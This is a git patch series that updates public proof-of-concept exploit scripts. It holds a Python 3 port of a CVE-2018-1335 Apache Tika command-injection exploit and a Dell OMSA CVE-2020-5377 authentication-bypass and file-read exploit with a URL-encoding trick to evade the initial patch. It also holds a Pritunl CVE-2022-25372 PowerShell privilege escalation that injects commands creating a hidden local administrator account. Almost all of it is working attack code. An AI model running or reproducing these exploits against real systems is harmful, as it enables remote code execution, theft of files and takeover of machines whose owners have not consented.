From 4cc4ef9b4f453b3b98baaa5ccf6a2da10e5e6415 Mon Sep 17 00:00:00 2001 From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 11:50:04 -0500 Subject: [PATCH 1/4] Update CVE-2018-1335.py Changed the PoC from Python2 to Python3 --- CVE-2018-1335/CVE-2018-1335.py | 43 +++++++++++++++++++--------------- 1 file changed, 24 insertions(+), 19 deletions(-) diff --git a/CVE-2018-1335/CVE-2018-1335.py b/CVE-2018-1335/CVE-2018-1335.py index 7e428c4..e0c1192 100644 --- a/CVE-2018-1335/CVE-2018-1335.py +++ b/CVE-2018-1335/CVE-2018-1335.py @@ -10,29 +10,34 @@ import requests if len(sys.argv) < 4: - print "Usage: python CVE-2018-1335.py " - print "Example: python CVE-2018-1335.py localhost 9998 calc.exe" + print("Usage: python CVE-2018-1335.py ") + print("Example: python CVE-2018-1335.py localhost 9998 calc.exe") else: - host = sys.argv[1] - port = sys.argv[2] - cmd = sys.argv[3] + host = sys.argv[1] + port = sys.argv[2] + cmd = sys.argv[3] - url = host+":"+str(port)+"/meta" + url = f"{host}:{port}/meta" - headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", - "X-Tika-OCRLanguage": "//E:Jscript", - "Expect": "100-continue", - "Content-type": "image/jp2", - "Connection": "close"} + headers = { + "X-Tika-OCRTesseractPath": "\"cscript\"", + "X-Tika-OCRLanguage": "//E:Jscript", + "Expect": "100-continue", + "Content-type": "image/jp2", + "Connection": "close" + } + jscript = ''' + var oShell = WScript.CreateObject("WScript.Shell"); + var oExec = oShell.Exec('cmd /c {}'); + '''.format(cmd) - jscript='''var oShell = WScript.CreateObject("WScript.Shell"); - var oExec = oShell.Exec('cmd /c {}'); - '''.format(cmd) - - try: - requests.put("https://"+url, headers=headers, data=jscript, verify=False) - - except: + try: + requests.put(f"https://{url}", headers=headers, data=jscript, verify=False) + except: + try: + requests.put(f"http://{url}", headers=headers, data=jscript) + except: + print("Something went wrong.\nUsage: python CVE-2018-1335.py ") try: requests.put("http://"+url, headers=headers, data=jscript) except: From f10d1f67f14f6943d704348437dd9c81dc98f2a9 Mon Sep 17 00:00:00 2001 From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 12:20:14 -0500 Subject: [PATCH 2/4] Update CVE-2020-5377.py - Updated the PoC from Python2 to Python3 - This also includes the URL encoding on the "download" link to bypass the initial patch --- CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py | 182 +++++++++--------- 1 file changed, 95 insertions(+), 87 deletions(-) diff --git a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py index 011db92..e7754a0 100644 --- a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py +++ b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py @@ -5,108 +5,116 @@ # https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability from xml.sax.saxutils import escape -import BaseHTTPServer -import requests -import thread +import http.server import ssl import sys import re import os +import requests +import _thread import urllib3 urllib3.disable_warnings() if len(sys.argv) < 3: - print 'Usage python auth_bypass.py :' - exit() - -#This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 -#Also check out https://github.com/hantwister/FakeDellOM -class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): - def do_POST(s): - data = '' - content_len = int(s.headers.getheader('content-length', 0)) - post_body = s.rfile.read(content_len) - s.send_response(200) - s.send_header("Content-type", "application/soap+xml;charset=UTF-8") - s.end_headers() - if "__00omacmd=getuserrightsonly" in post_body: - data = escape("0458759") - if "__00omacmd=getaboutinfo " in post_body: - data = escape("6.0.3") - if data: - requid = re.findall('>uuid:(.*?)<',post_body)[0] - s.wfile.write(''' - - - http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous - uuid:'''+requid+''' - 0d70cce2-05b9-45bb-b219-4fb81efba639 - - - - 0 - '''+data+''' - - - ''') - - else: - s.wfile.write('''http://schemas.dmtf.org/wbem/wsman/1/wsman.xsdFake Dell Open Manage Server Node1.0''') - - def log_message(self, format, *args): - return - -createdCert = False + print('Usage: python file-read.py :') + exit() + +# This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 +# Also check out https://github.com/hantwister/FakeDellOM +class MyHandler(http.server.BaseHTTPRequestHandler): + def do_POST(self): + data = b'' + content_len = int(self.headers.get('content-length', 0)) + post_body = self.rfile.read(content_len) + self.send_response(200) + self.send_header("Content-type", "application/soap+xml;charset=UTF-8") + self.end_headers() + if b"__00omacmd=getuserrightsonly" in post_body: + data = escape("0458759").encode('utf-8') + if b"__00omacmd=getaboutinfo " in post_body: + data = escape("6.0.3").encode('utf-8') + if data: + requid = re.findall(b'>uuid:(.*?)<', post_body)[0] + response = b''' + + + http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous + uuid:'''+requid+b''' + 0d70cce2-05b9-45bb-b219-4fb81efba639 + + + + 0 + '''+data+b''' + + + ''' + self.wfile.write(response) + + else: + self.wfile.write(b'''http://schemas.dmtf.org/wbem/wsman/1/wsman.xsdDell Inc.1.0''') + + def log_message(self, format, *args): + return + +created_cert = False if not os.path.isfile('./server.pem'): - print '[-] No server.pem certifcate file found. Generating one...' - os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') - createdCert = True + print('[-] No server.pem certificate file found. Generating one...') + os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') + created_cert = True -def startServer(): - server_class = BaseHTTPServer.HTTPServer - httpd = httpd = server_class(('0.0.0.0', 443), MyHandler) - httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) - httpd.serve_forever() +def start_server(): + server_class = http.server.HTTPServer + httpd = server_class(('0.0.0.0', 443), MyHandler) + context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) + context.load_cert_chain(certfile='./server.pem') + httpd.socket = context.wrap_socket(httpd.socket, server_side=True) + httpd.serve_forever() -thread.start_new_thread(startServer,()) +_thread.start_new_thread(start_server, ()) -myIP = sys.argv[1] +my_ip = sys.argv[1] target = sys.argv[2] -def bypassAuth(): - values = {} - url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) - data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} - r = requests.post(url, data=data, verify=False, allow_redirects=False) - cookieheader = r.headers['Set-Cookie'] - sessionid = re.findall('JSESSIONID=(.*?);',cookieheader) - pathid = re.findall('Path=/(.*?);',cookieheader) - values['sessionid'] = sessionid[0] - values['pathid'] = pathid[0] - return values - -ids = bypassAuth() -sessionid = ids['sessionid'] -pathid = ids['pathid'] - -print "Session: "+sessionid -print "VID: "+pathid - -def readFile(target,sessid,pathid): +def bypass_auth(): + values = {} + url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) + data = {"manuallogin": "true", "targetmachine": my_ip, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} + r = requests.post(url, data=data, verify=False, allow_redirects=False) + cookie_header = r.headers['Set-Cookie'] + session_id = re.findall('JSESSIONID=(.*?);', cookie_header) + path_id = re.findall('Path=/(.*?);', cookie_header) + values['sessionid'] = session_id[0] + values['pathid'] = path_id[0] + return values + +ids = bypass_auth() +session_id = ids['sessionid'] +path_id = ids['pathid'] + +print("Session: " + session_id) +print("VID: " + path_id) + +def read_file(target, sess_id, path_id): while True: - file = raw_input('file > ') - url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file) - cookies = {"JSESSIONID": sessid} - r = requests.get(url, cookies=cookies, verify=False) - print 'Reading contents of {}:\n{}'.format(file,r.content) - -def getPath(path): - if path.lower().startswith('c:\\'): - path = path[2:] - path = path.replace('\\','/') - return path - -readFile(target,sessionid,pathid) + file = input('file > ') + url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target, path_id, path_id, file) + s = requests.Session() + cookies = {"JSESSIONID": sess_id} + req = requests.Request(method='GET', url=url, cookies=cookies) + prep = req.prepare() + prep.url = "https://{}/{}/DownloadServle%74?help=Certificate&app=oma&vid={}&file={}".format(target, path_id, path_id, file) + r = s.send(prep, verify=False) + print('Reading contents of {}:\n{}'.format(file, r.content.decode('utf-8'))) + +def get_path(path): + if path.lower().startswith('c:\\'): + path = path[2:] + path = path.replace('\\','/') + return path + +read_file(target, session_id, path_id) + From 668b0dde77647274922c939b63a3f964574a3a3a Mon Sep 17 00:00:00 2001 From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 12:52:52 -0500 Subject: [PATCH 3/4] Update CVE-2022-25372.ps1 - Updated PoC to demonstrate privilege escalation by creating a new user and adding them to the administrators group. --- CVE-2022-25372/CVE-2022-25372.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CVE-2022-25372/CVE-2022-25372.ps1 b/CVE-2022-25372/CVE-2022-25372.ps1 index 2b3412e..49aa2db 100644 --- a/CVE-2022-25372/CVE-2022-25372.ps1 +++ b/CVE-2022-25372/CVE-2022-25372.ps1 @@ -1,2 +1,2 @@ $profile_id = ((Select-String '{"name":"privesc"' $env:APPDATA\pritunl\profiles\*).filename).split('.')[0]; -while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"INJECTED CONTENT`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"} \ No newline at end of file +while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"& net user test SecurePassword123 /add /expires:never /passwordchg:no && net localgroup administrators test /add &`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"} From 9d526169e84d221ed4352c8ed2c5e95a5c256b63 Mon Sep 17 00:00:00 2001 From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 16:04:52 -0500 Subject: [PATCH 4/4] Update CVE-2020-5377.py - Updated the python name to the CVE --- CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py index e7754a0..8b06464 100644 --- a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py +++ b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py @@ -17,7 +17,7 @@ urllib3.disable_warnings() if len(sys.argv) < 3: - print('Usage: python file-read.py :') + print('Usage: python CVE-2020-5377.py :') exit() # This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909